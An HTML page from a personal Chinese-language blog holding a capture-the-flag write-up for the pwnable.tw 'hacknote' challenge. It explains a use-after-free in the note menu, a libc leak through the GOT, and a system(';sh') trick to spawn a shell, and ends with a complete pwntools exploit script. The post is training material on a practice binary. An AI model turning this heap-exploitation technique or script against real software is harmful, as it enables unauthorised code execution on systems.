<!DOCTYPE html>
<html lang=" en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">

  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.png">
  <link rel="manifest" href="/images/site.webmanifest">
  <link rel="shortcut icon" href="/images/favicon.ico">

  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>pwnable.tw hacknote | Y²的博客</title>
<meta name="generator" content="Jekyll v3.10.0" />
<meta property="og:title" content="pwnable.tw hacknote" />
<meta name="author" content="Y² (aka.cameudis)" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="UAF，以及发现了使用 system() 的小技巧。" />
<meta property="og:description" content="UAF，以及发现了使用 system() 的小技巧。" />
<link rel="canonical" href="https://www.cameudis.com/2022/09/01/pwnable-tw-hacknote-writeup.html" />
<meta property="og:url" content="https://www.cameudis.com/2022/09/01/pwnable-tw-hacknote-writeup.html" />
<meta property="og:site_name" content="Y²的博客" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2022-09-01T23:04:01+08:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="pwnable.tw hacknote" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Y² (aka.cameudis)"},"dateModified":"2022-09-01T23:04:01+08:00","datePublished":"2022-09-01T23:04:01+08:00","description":"UAF，以及发现了使用 system() 的小技巧。","headline":"pwnable.tw hacknote","mainEntityOfPage":{"@type":"WebPage","@id":"https://www.cameudis.com/2022/09/01/pwnable-tw-hacknote-writeup.html"},"url":"https://www.cameudis.com/2022/09/01/pwnable-tw-hacknote-writeup.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="https://www.cameudis.com/feed.xml" title="Y²的博客" /><script src="//unpkg.com/valine/dist/Valine.min.js"></script>
  <script type="text/javascript" async
    src="https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-MML-AM_CHTML">
  </script>
</head>
<body><header class="site-header" role="banner">
  <div class="wrapper"><div class="header-content">
      <div class="header-content-left">
        <a class="site-title" rel="author" href="/">Y²的博客</a>

        <button class="search-button" id="search-toggle" aria-label="搜索">
          <svg width="20px" height="20px" viewBox="0 0 100 100" style="shape-rendering: crispEdges;">
            <!-- Frame (Light Gray for dark theme visibility) -->
            <rect x="30" y="10" width="10" height="10" fill="#eee" />
            <rect x="40" y="10" width="10" height="10" fill="#eee" />
            <rect x="50" y="10" width="10" height="10" fill="#eee" />
            <rect x="20" y="20" width="10" height="10" fill="#eee" />
            <rect x="60" y="20" width="10" height="10" fill="#eee" />
            <rect x="10" y="30" width="10" height="10" fill="#eee" />
            <rect x="70" y="30" width="10" height="10" fill="#eee" />
            <rect x="10" y="40" width="10" height="10" fill="#eee" />
            <rect x="70" y="40" width="10" height="10" fill="#eee" />
            <rect x="10" y="50" width="10" height="10" fill="#eee" />
            <rect x="70" y="50" width="10" height="10" fill="#eee" />
            <rect x="20" y="60" width="10" height="10" fill="#eee" />
            <rect x="60" y="60" width="10" height="10" fill="#eee" />
            <rect x="30" y="70" width="10" height="10" fill="#eee" />
            <rect x="40" y="70" width="10" height="10" fill="#eee" />
            <rect x="50" y="70" width="10" height="10" fill="#eee" />
            <!-- Lens -->
            <rect x="30" y="20" width="10" height="10" fill="#aee" />
            <rect x="40" y="20" width="10" height="10" fill="#bff" />
            <rect x="50" y="20" width="10" height="10" fill="#aee" />
            <rect x="20" y="30" width="10" height="10" fill="#aee" />
            <rect x="30" y="30" width="10" height="10" fill="#bff" />
            <rect x="40" y="30" width="10" height="10" fill="#cfe" />
            <rect x="50" y="30" width="10" height="10" fill="#bff" />
            <rect x="60" y="30" width="10" height="10" fill="#aee" />
            <rect x="20" y="40" width="10" height="10" fill="#bff" />
            <rect x="30" y="40" width="10" height="10" fill="#cfe" />
            <rect x="40" y="40" width="10" height="10" fill="#fff" />
            <rect x="50" y="40" width="10" height="10" fill="#cfe" />
            <rect x="60" y="40" width="10" height="10" fill="#bff" />
            <rect x="20" y="50" width="10" height="10" fill="#aee" />
            <rect x="30" y="50" width="10" height="10" fill="#bff" />
            <rect x="40" y="50" width="10" height="10" fill="#cfe" />
            <rect x="50" y="50" width="10" height="10" fill="#bff" />
            <rect x="60" y="50" width="10" height="10" fill="#aee" />
            <rect x="30" y="60" width="10" height="10" fill="#aee" />
            <rect x="40" y="60" width="10" height="10" fill="#bff" />
            <rect x="50" y="60" width="10" height="10" fill="#aee" />
            <!-- Handle -->
            <rect x="70" y="70" width="10" height="10" fill="#eee" />
            <rect x="80" y="80" width="10" height="10" fill="#eee" />
            <rect x="90" y="90" width="10" height="10" fill="#eee" />
          </svg>
        </button>
      </div><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path
                d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z" />
            </svg>
          </span>
        </label>
        <div class="trigger"><a class="page-link" href="/about/">About</a><a class="page-link" href="/diary/">Diary</a><a class="page-link" href="/links/">Links</a><a class="page-link" href="/readings/">Readings</a></div>
      </nav></div>
  </div>
</header>

<!-- 搜索弹窗 -->
<div class="search-overlay" id="search-overlay">
  <div class="search-modal">
    <div class="search-header">
      <input type="text" id="search-input" placeholder="搜索文章..." autocomplete="off">
      <button class="search-close" id="search-close">&times;</button>
    </div>
    <div class="search-results" id="search-results"></div>
  </div>
</div>

<style>
  /* Header 样式修改 */
  .header-content {
    display: flex;
    align-items: center;
    justify-content: space-between;
  }

  .header-content-left {
    display: flex;
    gap: 5px;
  }

  .search-button {
    background: none;
    border: none;
    cursor: pointer;
    padding: 8px;
    border-radius: 4px;
    transition: background-color 0.3s ease;
    display: flex;
    align-items: center;
    justify-content: center;
    float: left;
    color: #fff;
  }

  .search-button:hover {
    background-color: rgba(0, 0, 0, 0.1);
  }

  .search-button svg {
    fill: currentColor;
  }

  /* 搜索弹窗样式 */
  .search-overlay {
    position: fixed;
    top: 0;
    left: 0;
    right: 0;
    bottom: 0;
    background: rgba(0, 0, 0, 0.5);
    display: none;
    z-index: 1000;
    align-items: flex-start;
    justify-content: center;
    padding-top: 100px;
  }

  .search-overlay.active {
    display: flex;
  }

  .search-modal {
    background: white;
    border-radius: 8px;
    box-shadow: 0 10px 30px rgba(0, 0, 0, 0.3);
    width: 90%;
    max-width: 600px;
    max-height: 80vh;
    overflow: hidden;
    animation: searchModalIn 0.3s ease-out;
  }

  @keyframes searchModalIn {
    from {
      opacity: 0;
      transform: translateY(-20px);
    }

    to {
      opacity: 1;
      transform: translateY(0);
    }
  }

  .search-header {
    display: flex;
    align-items: center;
    padding: 20px;
    border-bottom: 1px solid #eee;
  }

  .search-input,
  #search-input {
    flex: 1;
    border: none;
    outline: none;
    font-size: 18px;
    padding: 10px 0;
    background: transparent;
  }

  .search-close {
    background: none;
    border: none;
    font-size: 24px;
    cursor: pointer;
    padding: 0;
    margin-left: 15px;
    color: #666;
    width: 30px;
    height: 30px;
    display: flex;
    align-items: center;
    justify-content: center;
    border-radius: 50%;
    transition: background-color 0.3s ease;
  }

  .search-close:hover {
    background-color: #f0f0f0;
  }

  .search-results {
    max-height: 400px;
    overflow-y: auto;
    padding: 10px 0;
  }

  .search-result {
    padding: 15px 20px;
    border-bottom: 1px solid #f0f0f0;
    cursor: pointer;
    transition: background-color 0.3s ease;
  }

  .search-result:hover {
    background-color: #f8f9fa;
  }

  .search-result:last-child {
    border-bottom: none;
  }

  .search-result h3 {
    margin: 0 0 5px 0;
    font-size: 16px;
    color: #333;
  }

  .search-result h3 a {
    text-decoration: none;
    color: inherit;
  }

  .search-result p {
    margin: 5px 0;
    color: #666;
    font-size: 14px;
    line-height: 1.4;
  }

  .search-result small {
    color: #999;
    font-size: 12px;
  }

  .search-highlight {
    background-color: #fff3cd;
    padding: 1px 2px;
    border-radius: 2px;
  }

  .search-no-results {
    padding: 40px 20px;
    text-align: center;
    color: #666;
  }

  /* 响应式设计 */
  @media (max-width: 600px) {
    .search-overlay {
      padding-top: 50px;
    }

    .search-modal {
      width: 95%;
      margin: 0 auto;
    }

    .search-header {
      padding: 15px;
    }

    .search-input,
    #search-input {
      font-size: 16px;
    }
  }
</style>

<script src="https://cdn.jsdelivr.net/npm/algoliasearch@4/dist/algoliasearch-lite.umd.js"></script>
<script>
  document.addEventListener('DOMContentLoaded', function () {
    const searchClient = algoliasearch('YU3CCWYOVD', 'dec1d1e53d245f8fc3122fa9b41ab7ae');
    const index = searchClient.initIndex('blog-jekyll');

    const searchToggle = document.getElementById('search-toggle');
    const searchOverlay = document.getElementById('search-overlay');
    const searchClose = document.getElementById('search-close');
    const searchInput = document.getElementById('search-input');
    const searchResults = document.getElementById('search-results');

    let searchTimeout;

    searchToggle.addEventListener('click', function () {
      searchOverlay.classList.add('active');
      searchInput.focus();
    });

    // 关闭搜索弹窗
    function closeSearch() {
      searchOverlay.classList.remove('active');
      searchInput.value = '';
      searchResults.innerHTML = '';
    }

    searchClose.addEventListener('click', closeSearch);

    // 点击遮罩关闭
    searchOverlay.addEventListener('click', function (e) {
      if (e.target === searchOverlay) {
        closeSearch();
      }
    });

    // ESC 键关闭
    document.addEventListener('keydown', function (e) {
      if (e.key === 'Escape' && searchOverlay.classList.contains('active')) {
        closeSearch();
      }
    });

    // 搜索功能
    searchInput.addEventListener('input', function () {
      const query = this.value.trim();

      clearTimeout(searchTimeout);

      if (query.length === 0) {
        searchResults.innerHTML = '';
        return;
      }

      // 防抖处理
      searchTimeout = setTimeout(() => {
        performSearch(query);
      }, 300);
    });

    function performSearch(query) {
      index.search(query, {
        hitsPerPage: 10,
        attributesToHighlight: ['title', 'content'],
        highlightPreTag: '<span class="search-highlight">',
        highlightPostTag: '</span>'
      }).then(({ hits }) => {
        displayResults(hits, query);
      }).catch(error => {
        console.error('搜索错误:', error);
        searchResults.innerHTML = '<div class="search-no-results">搜索出错，请稍后重试</div>';
      });
    }

    function displayResults(hits, query) {
      if (hits.length === 0) {
        searchResults.innerHTML = '<div class="search-no-results">没有找到相关内容</div>';
        return;
      }

      const resultsHtml = hits.map(hit => {
        const title = hit._highlightResult?.title?.value || hit.title || '无标题';
        const excerpt = hit._highlightResult?.content?.value || hit.excerpt || hit.content || '';
        const url = hit.url || '#';
        const date = hit.date || '';

        // 截取摘要
        const cleanExcerpt = excerpt.replace(/<[^>]*>/g, '').substring(0, 150);

        return `
        <div class="search-result" onclick="window.location.href='${url}'">
          <h3><a href="${url}">${title}</a></h3>
          <p>${cleanExcerpt}${cleanExcerpt.length === 150 ? '...' : ''}</p>
          ${date ? `<small>${date}</small>` : ''}
        </div>
      `;
      }).join('');

      searchResults.innerHTML = resultsHtml;
    }
  });
</script>
<main class="page-content" aria-label="Content">
    <div class="wrapper">
      <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

        <header class="post-header">
          <h1 class="post-title p-name" itemprop="name headline">pwnable.tw hacknote</h1>
          <div class="post-meta">
            <time class="dt-published" datetime="2022-09-01T23:04:01+08:00" itemprop="datePublished">[ 2022-09-01 ]
            </time>
            
            <span class="post-tags">:: #pwnable.tw</span>
            </div>
        </header>

        <div class="post-layout-container">
          
          <aside class="post-toc">
            <div class="toc-title">TABLE_OF_CONTENTS</div>
            <ul><li><a href="#程序分析">程序分析</a></li><li><a href="#漏洞分析">漏洞分析</a></li><li><a href="#利用-exploitation">利用 Exploitation</a></li></ul>
          </aside>

          <div class="post-content e-content" itemprop="articleBody">
            <p>UAF，以及发现了使用 <code class="language-plaintext highlighter-rouge">system()</code> 的小技巧。</p>

<h2 id="程序分析">程序分析</h2>

<p>保护：</p>

<pre><code class="language-txt">[*] '/home/nss/Desktop/pwnable.tw/hacknote/hacknote'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8047000)
</code></pre>

<p>作为一个菜单题，本题菜单如下：</p>

<pre><code class="language-txt">----------------------
       HackNote       
----------------------
 1. Add note          
 2. Delete note       
 3. Print note        
 4. Exit              
----------------------
</code></pre>

<p><strong>Add note：</strong>
申请一个0x16的区块（<code class="language-plaintext highlighter-rouge">malloc(0x8)</code>）和一个用户决定大小的区块(<code class="language-plaintext highlighter-rouge">malloc(size)</code>)，我将其称为<strong>控制区块</strong>和<strong>用户区块</strong>。
在控制区块的8字节用户可用空间中，分别塞入一个函数地址、和用户区块的地址。
然后进行 <code class="language-plaintext highlighter-rouge">read(0, malloc(size), size)</code>，允许用户输入内容至用户区块。</p>

<p>在一个固定地址（<code class="language-plaintext highlighter-rouge">0x0804a050</code>），存放着一个指针数组，用来存储历次分配产生的控制区块的地址。
为了防止溢出，程序在每次add note时都会先检查全局变量note_count（自己取的名），并且在分配成功后让note_count++。最多可以分配5个区块。</p>

<p><strong>Delete note：</strong>
输入index，将对应的用户数组和控制数组释放（注意先后顺序）。
但这里并不会让note_count–，也不会从全局指针数组中删除控制区块。<strong>只会free而已。</strong></p>

<p><strong>Print note：</strong>
输入index，将对应控制区块的用户可用空间地址压栈（也就是函数的指针的地址），调用对应控制数组存放的函数（该函数会将arg0加4后作为一个 <code class="language-plaintext highlighter-rouge">char*</code> 调用 <code class="language-plaintext highlighter-rouge">puts</code> 输出）。</p>

<h2 id="漏洞分析">漏洞分析</h2>

<p>本题没有buffer overflow（都是调用read完成），也没有栈上的漏洞。
唯一的漏洞在于UAF——<strong>程序在使用delete note来free区块之后，依然能够使用print note来使用对应区块存放的数据（具体来说，调用存放的函数指针）。</strong></p>

<p>所以只需要构造一下，使得<strong>已经被释放的控制区块被分配作用户区块</strong>，这样就可以在控制区块中写入信息，控制控制流。</p>

<h2 id="利用-exploitation">利用 Exploitation</h2>

<p>我先随意 <code class="language-plaintext highlighter-rouge">add_note</code> 两次并释放之，两个原控制区块都被 <code class="language-plaintext highlighter-rouge">free</code> 到fast bin中。然后再 <code class="language-plaintext highlighter-rouge">add_note(8)</code>，那么此时原来的两个控制区块，一个被用作新的控制区块，另一个被用作了用户区块。</p>

<p>这时，我往用户区块中塞入两个4Bytes：一个是程序特化的打印函数，会把参数当作地址+4后，调用 <code class="language-plaintext highlighter-rouge">puts</code> 函数打印之；还有一个是got表中 <code class="language-plaintext highlighter-rouge">puts</code> 的地址（这里任意got表中函数都可以）。
然后调用print note，这样程序就会把got表中 <code class="language-plaintext highlighter-rouge">puts</code> 的地址打印出来，那么libc基地址就有了。</p>

<p>之后可以故技重施，再把那两个受害者区块 <code class="language-plaintext highlighter-rouge">free</code> 再 <code class="language-plaintext highlighter-rouge">malloc</code> ，此时再往用户区块中塞入两个4Bytes：一个是 <code class="language-plaintext highlighter-rouge">system()</code> 地址，<strong>另一个是 <code class="language-plaintext highlighter-rouge">b'sh\x00'</code></strong>。
由于print note会把对应控制区块的用户可用空间压栈，也就是此时的 <code class="language-plaintext highlighter-rouge">&amp;system()</code>，所以实际上我执行的是 <code class="language-plaintext highlighter-rouge">system(pack(system()) + ";sh")</code>，<strong>通过分号来bypass前四个字节的不可打印字符</strong>。</p>

<p>（除该技巧外，别的部分早就想出来了，就该技巧卡了好久，最后看网上wp学到了……）</p>

<p>EXP如下：</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">context</span><span class="p">.</span><span class="n">arch</span><span class="o">=</span><span class="s">'i386'</span>
<span class="c1"># context.log_level='debug'
</span>
<span class="n">filename</span><span class="o">=</span><span class="s">"./hacknote"</span>
<span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">([</span><span class="n">filename</span><span class="p">])</span>
<span class="n">elf</span><span class="o">=</span><span class="n">ELF</span><span class="p">(</span><span class="n">filename</span><span class="p">)</span>

<span class="n">libc_name</span><span class="o">=</span><span class="s">"libc_32.so.6"</span>
<span class="n">libc</span><span class="o">=</span><span class="n">ELF</span><span class="p">(</span><span class="n">libc_name</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">add_note</span><span class="p">(</span><span class="n">size</span><span class="p">,</span> <span class="n">data</span><span class="p">):</span>
    <span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'Your choice :'</span><span class="p">)</span>
    <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s">'1'</span><span class="p">)</span>
    <span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'Note size :'</span><span class="p">)</span>
    <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">size</span><span class="p">).</span><span class="n">encode</span><span class="p">(</span><span class="s">'ascii'</span><span class="p">))</span>
    <span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'Content :'</span><span class="p">)</span>
    <span class="n">io</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">delete_note</span><span class="p">(</span><span class="n">index</span><span class="p">):</span>
    <span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'Your choice :'</span><span class="p">)</span>
    <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s">'2'</span><span class="p">)</span>
    <span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'Index :'</span><span class="p">)</span>
    <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">index</span><span class="p">).</span><span class="n">encode</span><span class="p">(</span><span class="s">'ascii'</span><span class="p">))</span>

<span class="k">def</span> <span class="nf">print_note</span><span class="p">(</span><span class="n">index</span><span class="p">):</span>
    <span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'Your choice :'</span><span class="p">)</span>
    <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s">'3'</span><span class="p">)</span>
    <span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'Index :'</span><span class="p">)</span>
    <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">index</span><span class="p">).</span><span class="n">encode</span><span class="p">(</span><span class="s">'ascii'</span><span class="p">))</span>

<span class="n">io</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s">"chall.pwnable.tw"</span><span class="p">,</span> <span class="mi">10102</span><span class="p">)</span>

<span class="c1"># leak libc_addr (using got["puts"], but actually all got[*] will work as same)
</span><span class="n">add_note</span><span class="p">(</span><span class="mi">32</span><span class="p">,</span> <span class="sa">b</span><span class="s">'/bin/sh'</span><span class="p">)</span>
<span class="n">add_note</span><span class="p">(</span><span class="mi">32</span><span class="p">,</span> <span class="sa">b</span><span class="s">'111'</span><span class="p">)</span>
<span class="n">delete_note</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="n">delete_note</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="n">add_note</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="n">pack</span><span class="p">(</span><span class="mh">0x804862b</span><span class="p">)</span><span class="o">+</span><span class="n">pack</span><span class="p">(</span><span class="n">elf</span><span class="p">.</span><span class="n">got</span><span class="p">[</span><span class="s">"puts"</span><span class="p">]))</span>
<span class="n">print_note</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="c1"># calculate libc_addr
</span><span class="n">mes</span> <span class="o">=</span> <span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'HackNote'</span><span class="p">)</span>
<span class="n">libc_base</span> <span class="o">=</span> <span class="n">unpack</span><span class="p">(</span><span class="n">mes</span><span class="p">[</span><span class="mi">0</span><span class="p">:</span><span class="mi">4</span><span class="p">])</span> <span class="o">-</span> <span class="n">libc</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">"puts"</span><span class="p">]</span>
<span class="k">print</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">libc_base</span><span class="p">))</span>

<span class="c1"># system(b'\x??'*4 + b';sh\x00')
</span><span class="n">delete_note</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span>
<span class="n">add_note</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="n">pack</span><span class="p">(</span><span class="n">libc_base</span><span class="o">+</span><span class="n">libc</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">"system"</span><span class="p">])</span><span class="o">+</span><span class="sa">b</span><span class="s">';sh</span><span class="se">\x00</span><span class="s">'</span><span class="p">)</span>
<span class="n">print_note</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>

<span class="n">io</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span>
</code></pre></div></div>

          </div>
        </div>

        




  

  
    <section class="related-posts">
      <h3 class="related-posts-title">RECOMMENDED_READS</h3>
      <div class="related-posts-list">
        
    
      
        
        
        

        
      
    
      
        
        
        

        
      
    
      
        
        
        

        
      
    
      
        
        
        

        
      
    
      
        
        
        

        
      
    
      
        
        
        

        
      
    
      
        
        
        

        
      
    
      
        
        
        

        
      
    
      
        
        
        

        
      
    
      
        
        
        

        
      
    
      
        
        
        

        
      
    
      
        
        
        

        
      
    
      
        
        
        

        
          <div class="related-post-item">
            <span class="related-post-date">[ 2023-10-24 ]</span>
            <a href="/2023/10/24/pwnable-tw-BabyStack-writeup.html" class="related-post-link">pwnable.tw BabyStack</a>
            <span class="common-tags"> #pwnable.tw</span>
          </div>
          
          
        
      
    
      
        
        
        

        
          <div class="related-post-item">
            <span class="related-post-date">[ 2023-10-13 ]</span>
            <a href="/2023/10/13/pwnable-tw-Starbound-writeup.html" class="related-post-link">pwnable.tw Starbound</a>
            <span class="common-tags"> #pwnable.tw</span>
          </div>
          
          
        
      
    
      
        
        
        

        
          <div class="related-post-item">
            <span class="related-post-date">[ 2023-05-07 ]</span>
            <a href="/2023/05/07/pwnable-tw-seethefile-writeup.html" class="related-post-link">pwnable.tw seethefile</a>
            <span class="common-tags"> #pwnable.tw</span>
          </div>
          
          
            
  
      </div>
    </section>
  

<div id="comments" class="post-comments"></div>
        <script>
  new Valine({
    el: "#comments",
    app_id: "Ji5y9HTOlb2QGDO0XFlWXNRy-gzGzoHsz",
    app_key: "6VqGye1352LX381YQDTOaiXs",
    placeholder: "El Psy Congroo",
  });
</script>


        <a class="u-url" href="/2022/09/01/pwnable-tw-hacknote-writeup.html" hidden></a>
      </article>
    </div>
  </main><footer class="site-footer h-card">
  <data class="u-url" href="/%20/"></data>
  <div class="wrapper">
    <div class="footer-header">
      <h2 class="footer-heading">[ Y²的博客 ]</h2>
      <p class="footer-status">STATUS: ONLINE / UPTIME: ∞</p>
    </div>

    <div class="footer-layout">
      <!-- Col 1: Contact -->
      <div class="footer-col">
        <div class="footer-title">CONTACT_INFO</div>
        <div class="footer-content">
          <p class="p-name">Y² (aka.cameudis)</p><a class="u-email" href="mailto:cameudis@gmail.com">cameudis@gmail.com</a></div>
      </div>

      <!-- Col 2: Social Links -->
      <div class="footer-col">
        <div class="footer-title">SOCIAL_NETWORKS</div>
        <div class="footer-content"><ul class="social-media-list"><li><a href="https://github.com/cameudis"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg> <span class="username">cameudis</span></a></li><li><a href="https://www.twitter.com/cameudis"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#twitter"></use></svg> <span class="username">cameudis</span></a></li></ul>
</div>
      </div>

      <!-- Col 3: Visitor Map -->
      <div class="footer-col">
        <div class="footer-title">VISITOR_MAP</div>
        <div class="footer-map-mini">
          <script type='text/javascript' id='clustrmaps'
            src='//cdn.clustrmaps.com/map_v2.js?cl=4c566a&w=a&t=n&d=L7huRZdkUrGTYSGRyT_6pbao13uOO-F0vUN54U4t8po&co=121212&ct=b8b8b8&cmo=5e81ac&cmn=5e81ac&w=220'></script>
        </div>
      </div>
    </div>

    <div class="footer-bottom">
      <p class="quiet-humor">/* Free and useless. */</p>
      <p>&copy; 2025 Y² (aka.cameudis)</p>
    </div>
  </div>
</footer><script src="/assets/js/post.js"></script>

</body>

</html>